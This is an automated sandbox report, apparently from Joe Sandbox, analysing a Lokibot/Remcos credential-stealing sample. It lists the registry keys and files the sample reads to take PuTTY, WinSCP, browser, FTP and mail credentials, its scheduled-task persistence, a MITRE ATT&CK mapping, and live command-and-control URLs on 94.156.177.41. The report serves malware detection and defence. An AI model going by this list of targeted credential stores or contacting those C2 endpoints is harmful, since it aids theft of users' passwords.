Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Queries volume information: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kzQ25HVUbf.exe PID: 8076, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: PopPassword		18_2_0040D069
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: SmtpPassword		18_2_0040D069

Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kzQ25HVUbf.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
kzQ25HVUbf.exe	73%	Virustotal		Browse
kzQ25HVUbf.exe	100%	Avira	HEUR/AGEN.1309499
kzQ25HVUbf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	100%	Avira	HEUR/AGEN.1309499
C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Source	Detection	Scanner	Label	Link
http://94.156.177.41/soja/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/soja/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	kzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, iWEWjTXiqXke.exe, 0000000A.00000002.1573168768.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	iWEWjTXiqXke.exe, iWEWjTXiqXke.exe, 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589028
Start date and time:	2025-01-11 08:36:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kzQ25HVUbf.exe renamed because original name is a hash value
Original Sample Name:	8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/17@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 36 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:37:10	API Interceptor	124x Sleep call for process: kzQ25HVUbf.exe modified
02:37:15	API Interceptor	37x Sleep call for process: powershell.exe modified
02:37:23	API Interceptor	1x Sleep call for process: iWEWjTXiqXke.exe modified
07:37:16	Task Scheduler	Run new task: iWEWjTXiqXke path: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	YvVDV4cbjy.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	EozUxz4ybi.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Quotation2025-0107pdf.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/mars/five/fre.php
	ZsRFRjkt9q.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/alpha/five/fre.php
	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	huuG7N3jOv.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	4287eV6mBc.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	11626244731900027402.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	QQpQgSYkjW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	1r3DRyrX0T.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45
	TBUjHBNHaD.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45
	S7s4XhcN1G.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	YvVDV4cbjy.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	EozUxz4ybi.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	94.156.177.164
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	94.156.177.117
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	95.87.199.40
